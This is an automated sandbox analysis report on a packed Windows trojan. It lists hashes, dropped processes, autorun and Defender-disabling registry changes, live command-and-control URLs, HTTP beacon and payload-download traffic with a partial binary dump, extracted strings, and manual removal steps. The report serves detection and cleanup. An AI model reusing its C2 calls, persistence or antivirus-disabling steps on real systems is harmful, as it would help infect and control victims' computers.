MD5: cd1f5ed10e882f7d8a0c5f967fd45b75
SHA1: 30cb6df0f9178c4738cb37b78bb482c4569c6190
SHA256: 79434ff239e2393796637ffdb9f1087077c54bde8196bd9d162e4a5ea598929c
SSDeep: 3072:GgXdZt9P6D3XJXC/T7eBItOdoewR3kHhhDfrsHXTXQhv:Ge340r7kCOdVwsxfrsHXTAhv
Size: 144917 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company:
Created at: 2009-12-06 00:50:52
Analyzed on: Windows7 SP1 32-bit

Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Dropped creates the following process(es):

setupok.exe:2868
ddnow.exe:1840
ddnow.exe:4040
ddnow.exe:668
ddnow.exe:3872
ddnow.exe:556
ddnow.exe:3932
ddnow.exe:3272
ddnow.exe:2744
ddnow.exe:2408
%original file name%.exe:3860
tinstall.exe:3728

The Dropped injects its code into the following process(es):

applica.exe:2300

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process setupok.exe:2868 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):

%Program Files%\applica\applica.exe (12 bytes)
%Program Files%\applica\key.ini (0 bytes)
%Program Files%\applica\uninstall.exe (1030 bytes)

The Dropped deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nso41C0.tmp (0 bytes)

The process ddnow.exe:1840 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\run1.txt (3 bytes)

The process ddnow.exe:4040 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\aatxtname.txt (10 bytes)

The process ddnow.exe:668 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\run1.txt (3 bytes)

The process ddnow.exe:3872 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\run1.txt (3 bytes)

The process ddnow.exe:556 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\setupok.exe (61 bytes)

The process ddnow.exe:3272 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\run1.txt (3 bytes)

The process ddnow.exe:2744 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\run1.txt (3 bytes)

The process ddnow.exe:2408 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\run1.txt (3 bytes)

The process %original file name%.exe:3860 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\dnow.exe (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\tinstall.exe (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\ddnow.exe (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nst87B6.tmp\SimpleFC.dll (5469 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\dnow4.exe (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\tinstall4.exe (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\ddnow4.exe (5 bytes)

The Dropped deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsz8787.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\34245164.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\run1.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nst87B6.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\icka34245164.txt (0 bytes)

The process tinstall.exe:3728 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\system.ini (16 bytes)

The Dropped deletes the following file(s):

C:\Windows\System32\Tasks\Adobe Flash Player Updater (0 bytes)
C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore (0 bytes)
C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA (0 bytes)

Registry activity

The process setupok.exe:2868 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Applica]
"DisplayName" = "Applica"

"Publisher" = "Dotdo"

[HKLM\SOFTWARE\idot]
"idot" = "ok"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Applica]
"UninstallString" = "%Program Files%\Applica\uninstall.exe"

To automatically run itself each time Windows is booted, the Dropped adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Applica" = "%Program Files%\applica\applica.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Applica" = "%Program Files%\applica\applica.exe"

The process ddnow.exe:4040 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\ddnow_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"EnableFileTracing" = "0"
"FileTracingMask" = "4294901760"
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
"EnableConsoleTracing" = "0"

The process ddnow.exe:3932 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\ddnow_RASAPI32]
"FileDirectory" = "%windir%\tracing"
"MaxFileSize" = "1048576"
"EnableConsoleTracing" = "0"
"ConsoleTracingMask" = "4294901760"
"EnableFileTracing" = "0"
"FileTracingMask" = "4294901760"

The process %original file name%.exe:3860 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Policies\Microsoft\Windows Defender]
"DisableAntiSpyware" = "1"

The process tinstall.exe:3728 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\tinstall_RASMANCS]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\tinstall_RASAPI32]
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\tinstall_RASMANCS]
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\tinstall_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\tinstall_RASMANCS]
"MaxFileSize" = "1048576"
"FileDirectory" = "%windir%\tracing"
"ConsoleTracingMask" = "4294901760"

Dropped PE files

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 363
2ad305eb2625cacef55c0e012e3162da
1f25c7afbefbf33feab279e0b69de312
84a0834aa3cf86d0e03cb339f1acfd86
acf71053f845d276d7acfc233fd3cb6f
f17d83f93c68a4057a7d562626fab745
2171ff59892413c65994b6335007fb76
59c258e3888d0b4c02040dd649f60018
1f3d33e118bbeef358807c43a9ff02bf
6fae0efc37d2fbae20229d8ad9fea2d6
a9a691d86babf412bff5063a916d813c
db34845a89a44e13403497c06916949e
834f9a1ad76269c7a2f255b664a93f7a
4f810ac44ebcf38b781f6ffec908b30e
30dd59ea6b89831b1efb9ddd8cdf7c4b
2d60312dfc2613c1aa639be1068d9a5f
543be1971fe641023ca9b4e9a441f88c
affd91f1318160d33910095c59662ca6
15b151a60ee59281793c4592e8089e42
1afd38ad853ffd5744e9f8b809183717
03e67c5fd3d17208331cb10da2b41514
421ccf1fd130b0efa5a22a3c5e9e1745
0050d5a52818ce0f6a2ddafc727f4bf7
850ce9dc2931538f978c921b749d8d86
ded140d9ab8c0312c15813af59f60e54
1b0c8d430a3f14b68c9769400a4d9750

URLs

URL	IP
hxxp://162.222.193.23/soid1.php?p=&aaaip=588392
hxxp://162.222.193.23/goet1.php?p=&pid=&all=&dotnet=yes
hxxp://www.rosalesscholarly.pw/act/ehka.php?w=Windows7Ultimate&a=True&b=;7-Zip;ActiveState;Adobe;ATI Technologies;CBSTEST;Classes;Clients;Ghisler;Google;Intel;JavaSoft;JreMetrics;Macromedia;Microsoft;Mozilla;mozilla.org;MozillaPlugins;ODBC;Perl;Policies;RegisteredApplications;Sonic;ThinPrint;VMware, Inc.;WinPcap;WOW6432Node;Microsoft	162.222.194.54
hxxp://162.222.193.23/run1.php?a=flash&b=111
hxxp://162.222.193.23/setup200.exe
hxxp://162.222.193.23/run1.php?a=flash&b=rand
hxxp://162.222.193.23/run1.php?a=flash&b=setupok.exe - 61844
hxxp://162.222.193.23/run1.php?a=flash&b=setupok.exe - 61844 - 1
hxxp://162.222.193.23/run1.php?a=flash&b=setupok.exe - 61844 - 1 - ready
hxxp://162.222.193.23/newc4nT.php
teredo.ipv6.microsoft.com	157.56.120.207
dns.msftncsi.com	131.107.255.255

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY PE EXE or DLL Windows file download HTTP

Traffic

POST /run1.php?a=flash&b=111 HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: 162.222.193.23

Content-Length: 1

Expect: 100-continue

Connection: Keep-Alive

HTTP/1.1 100 Continue
....



a

HTTP/1.1 200 OK

Date: Tue, 25 Apr 2017 12:43:55 GMT

Server: Apache/2.2.22 (Win64) PHP/5.3.13

X-Powered-By: PHP/5.3.13

Content-Length: 3

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Content-Type: text/html
.....

GET /act/ehka.php?w=Windows7Ultimate&a=True&b=;7-Zip;ActiveState;Adobe;ATI Technologies;CBSTEST;Classes;Clients;Ghisler;Google;Intel;JavaSoft;JreMetrics;Macromedia;Microsoft;Mozilla;mozilla.org;MozillaPlugins;ODBC;Perl;Policies;RegisteredApplications;Sonic;ThinPrint;VMware, Inc.;WinPcap;WOW6432Node;Microsoft HTTP/1.1

Host: VVV.rosalesscholarly.pw

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Tue, 25 Apr 2017 12:43:49 GMT

Server: Apache/2.2.22 (Win64) PHP/5.3.13

X-Powered-By: PHP/5.3.13

Content-Length: 0

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Content-Type: text/html

POST /newc4nT.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: 162.222.193.23

Content-Length: 2

Expect: 100-continue

Connection: Keep-Alive

HTTP/1.1 100 Continue
....



OK

HTTP/1.1 200 OK

Date: Tue, 25 Apr 2017 12:44:43 GMT

Server: Apache/2.2.22 (Win64) PHP/5.3.13

X-Powered-By: PHP/5.3.13

Content-Length: 0

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Content-Type: text/html

POST /run1.php?a=flash&b=setupok.exe - 61844 HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: 162.222.193.23

Content-Length: 1

Expect: 100-continue

Connection: Keep-Alive

HTTP/1.1 100 Continue
....



a

HTTP/1.1 200 OK

Date: Tue, 25 Apr 2017 12:44:18 GMT

Server: Apache/2.2.22 (Win64) PHP/5.3.13

X-Powered-By: PHP/5.3.13

Content-Length: 3

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Content-Type: text/html
.....

POST /run1.php?a=flash&b=rand HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: 162.222.193.23

Content-Length: 1

Expect: 100-continue

Connection: Keep-Alive

HTTP/1.1 100 Continue
....



a

HTTP/1.1 200 OK

Date: Tue, 25 Apr 2017 12:44:04 GMT

Server: Apache/2.2.22 (Win64) PHP/5.3.13

X-Powered-By: PHP/5.3.13

Content-Length: 3

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Content-Type: text/html
.....

POST /run1.php?a=flash&b=setupok.exe - 61844 - 1 - ready HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: 162.222.193.23

Content-Length: 1

Expect: 100-continue

Connection: Keep-Alive

HTTP/1.1 100 Continue
....



a

HTTP/1.1 200 OK

Date: Tue, 25 Apr 2017 12:44:27 GMT

Server: Apache/2.2.22 (Win64) PHP/5.3.13

X-Powered-By: PHP/5.3.13

Content-Length: 3

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Content-Type: text/html
.....

POST /run1.php?a=flash&b=setupok.exe - 61844 - 1 HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: 162.222.193.23

Content-Length: 1

Expect: 100-continue

Connection: Keep-Alive

HTTP/1.1 100 Continue
....



a

HTTP/1.1 200 OK

Date: Tue, 25 Apr 2017 12:44:23 GMT

Server: Apache/2.2.22 (Win64) PHP/5.3.13

X-Powered-By: PHP/5.3.13

Content-Length: 3

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Content-Type: text/html
.....

POST /setup200.exe HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: 162.222.193.23

Content-Length: 1

Expect: 100-continue

Connection: Keep-Alive

HTTP/1.1 100 Continue
....



;

HTTP/1.1 200 OK

Date: Tue, 25 Apr 2017 12:43:59 GMT

Server: Apache/2.2.22 (Win64) PHP/5.3.13

X-Powered-By: PHP/5.3.13

Content-Description: File Transfer

Content-Disposition: attachment; filename=

Content-Transfer-Encoding: binary

Expires: 0

Cache-Control: must-revalidate, post-check=0, pre-check=0

Pragma: public

Content-Length: 61844

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Content-Type: application/octet-stream
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..i
u..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i..................
......PE..L......K.................^...........0.......p....@.........
.................................................................t....
......................................................................
.............p...............................text...L\.......^........
.......... ..`.rdata.......p.......b..............@..@.data...X\......
.....v..............@....ndata...................................rsrc.
...............z..............@..@....................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U....\.}..t .}.F.E.u..H...
.h.B..H.P.u..u..u...Hr@..B...SV.5p.B..E.WP.u...Lr@..e...E..E.P.u...Pr@
..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M.....
.....VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u
....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..
Tp@..u..5Xp@.W...E..E.h ...Pj.h`.B.W..Xr@..u.W...u....E.P.u...\r@._^3.
[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G...
..t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....
<<< skipped >>>

POST /soid1.php?p=&aaaip=588392 HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: 162.222.193.23

Content-Length: 2

Expect: 100-continue

Connection: Keep-Alive

HTTP/1.1 100 Continue
....



aa

HTTP/1.1 200 OK

Date: Tue, 25 Apr 2017 12:43:49 GMT

Server: Apache/2.2.22 (Win64) PHP/5.3.13

X-Powered-By: PHP/5.3.13

Content-Length: 10

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Content-Type: text/html
...1111111..

POST /goet1.php?p=&pid=&all=&dotnet=yes HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: 162.222.193.23

Content-Length: 83

Expect: 100-continue

Connection: Keep-Alive

HTTP/1.1 100 Continue
....



;hxwnxsh0nxh;0-$fire-ATSpywaregot--L$cgot-c:\cd1f5ed10e882f7d8a0c5f967
fd45b75.exe;0

HTTP/1.1 200 OK

Date: Tue, 25 Apr 2017 12:43:49 GMT

Server: Apache/2.2.22 (Win64) PHP/5.3.13

X-Powered-By: PHP/5.3.13

Content-Length: 0

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Content-Type: text/html

POST /run1.php?a=flash&b=rand HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: 162.222.193.23

Content-Length: 1

Expect: 100-continue

Connection: Keep-Alive

HTTP/1.1 100 Continue
....



a

HTTP/1.1 200 OK

Date: Tue, 25 Apr 2017 12:44:11 GMT

Server: Apache/2.2.22 (Win64) PHP/5.3.13

X-Powered-By: PHP/5.3.13

Content-Length: 3

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Content-Type: text/html
.....

POST /newc4nT.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: 162.222.193.23

Content-Length: 2

Expect: 100-continue

Connection: Keep-Alive

HTTP/1.1 100 Continue
....



OK

HTTP/1.1 200 OK

Date: Tue, 25 Apr 2017 12:44:37 GMT

Server: Apache/2.2.22 (Win64) PHP/5.3.13

X-Powered-By: PHP/5.3.13

Content-Length: 0

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Content-Type: text/html

The Dropped connects to the servers at the folowing location(s):

.text

`.rdata

@.data

.ndata

.rsrc

uDSSh

Gw2.Hw

.DEFAULT\Control Panel\International

Software\Microsoft\Windows\CurrentVersion

GetWindowsDirectoryA

KERNEL32.dll

ExitWindowsEx

USER32.dll

GDI32.dll

SHFileOperationA

ShellExecuteA

SHELL32.dll

RegEnumKeyA

RegCreateKeyExA

RegCloseKey

RegDeleteKeyA

RegOpenKeyExA

ADVAPI32.dll

COMCTL32.dll

ole32.dll

VERSION.dll

verifying installer: %d%%

hXXp://nsis.sf.net/NSIS_Error

... %d%%

~nsu.tmp

%u.%u%s%s

RegDeleteKeyExA

%s=%s

*?|<>/":

C:\Users\"%CurrentUserName%"\AppData\Local\ddnow.exe "hXXp://162.222.193.23/newc4nT.php" "OK" "C:\Users\"%CurrentUserName%"\AppData\Local\icka34245164.txt"

s\"%CurrentUserName%"\AppData\Local\run1.txt"

f7d8a0c5f967fd45b75.exe;0" "34245164.txt"

C:\Users\"%CurrentUserName%"\AppData\Local\icka34245164.txt

SimpleFC.dll

SID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\InprocServer32

ers\"%CurrentUserName%"\AppData\Local\Temp\nst87B6.tmp\SimpleFC.dll

> ?'?6?=?[?

8 8$8(8,808

7%7/767~7

5!5%5)5-51555

KWindows

HNetCfg.FwMgr

kernel32.dll

user32.dll

GetKeyboardType

advapi32.dll

oleaut32.dll

GetCPInfo

gdi32.dll

AddPort

EnableDisablePort

IsPortAdded

IsPortEnabled

RemovePort

? ?'?6?=?_?

>6<%<-<7

hWEB

..bYc

icka34245164.txt

5.ocx

ICKA34~1.TXT

rs\"%CurrentUserName%"\AppData\Local\setupok.exe

d1f5ed10e882f7d8a0c5f967fd45b75.exe

\Windows\system32\Macromed\Flash\Flash32_23_0_0_185.ocx

c:\%original file name%.exe

C:\Users\"%CurrentUserName%"\AppData\Local

%original file name%.exe

ers\"%CurrentUserName%"\AppData\Local\Temp\nsz8787.tmp

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nst87B6.tmp

Windows

setupok.exe - 61844 - 1

<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>

-Operation f

Eigenschaft %s existiert nicht.

OLE-Fehler %.8xBDie Methode '%s' wird vom Automatisierungsobjekt nicht unterst

ge ($0%x)3Komponente mit der Bezeichnung %s existiert bereits/In der Stringliste sind Duplikate nicht erlaubt#Datei %s kann nicht erstellt werden#Datei %s kann nicht ge

ffnet werden(''%s'' ist kein g

pft (%d)#Zu viele Eintr

ge in der Liste (%d)*Listenindex

berschreitet das Maximum (%d)BExpandieren des Speicher-Stream wegen Speichermangel nicht m

glich Fehler beim Lesen von %s%s%s: %s

%s.Seek nicht implementiert

r '%s' nicht gefunden&%s kann nicht zu %s zugewiesen werden

Klasse %s nicht gefunden

%s (%s, Zeile %d)

Abstrakter FehlerBZugriffsverletzung bei Adresse %p in Modul '%s'. %s von Adresse %p

Systemfehler. Code: %d.

%s:Ein Aufruf einer Betriebssystemfunktion ist fehlgeschlagen

ltige Variant-Operation#Ung

ltige Variant-Operation ($%.8x)

Variant ist kein ArrayBVariante des Typs (%s) konnte nicht in Typ (%s) konvertiert werdenF

berlauf bei der Konvertierung einer Variante vom Typ (%s) in Typ (%s)

ltiger Variant-Typ Operation wird nicht unterst

Externe Exception %x$Auswertung von assert fehlgeschlagen

ltige Zeigeroperation

ltige Typumwandlung4Zugriffsverletzung bei Adresse %p. %s von Adresse %p

Privilegierte Anweisung(Exception %s in Modul %s bei %p.

Anwendungsfehler7Format '%s' ung

r Format '%s'(Variant-Methodenaufruf nicht unterst

"'%s' ist kein g

ltiger Integerwert"'%s' ist kein g

E/A-Fehler %d

ltige Gleitkommaoperation

lash\Flash32_23_0_0_185.ocx

Remove it with Ad-Aware

1. Click (here) to download and install Ad-Aware Free Antivirus.
2. Update the definition files.
3. Run a full scan of your computer.

Manual removal*

1. Terminate malicious process(es) (How to End a Process With the Task Manager):
   

   setupok.exe:2868
   ddnow.exe:1840
   ddnow.exe:4040
   ddnow.exe:668
   ddnow.exe:3872
   ddnow.exe:556
   ddnow.exe:3932
   ddnow.exe:3272
   ddnow.exe:2744
   ddnow.exe:2408
   %original file name%.exe:3860
   tinstall.exe:3728

2. Delete the original Dropped file.
   
3. Delete or disinfect the following files created/modified by the Dropped:
   

   %Program Files%\applica\applica.exe (12 bytes)
   %Program Files%\applica\key.ini (0 bytes)
   %Program Files%\applica\uninstall.exe (1030 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\run1.txt (3 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\aatxtname.txt (10 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\setupok.exe (61 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\dnow.exe (4 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\tinstall.exe (7 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\ddnow.exe (5 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nst87B6.tmp\SimpleFC.dll (5469 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\dnow4.exe (5 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\tinstall4.exe (7 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\ddnow4.exe (5 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\system.ini (16 bytes)

4. Delete the following value(s) in the autorun key (How to Work with System Registry):
   

   [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
   "Applica" = "%Program Files%\applica\applica.exe"
   
   [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
   "Applica" = "%Program Files%\applica\applica.exe"

5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
   
6. Reboot the computer.
   

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.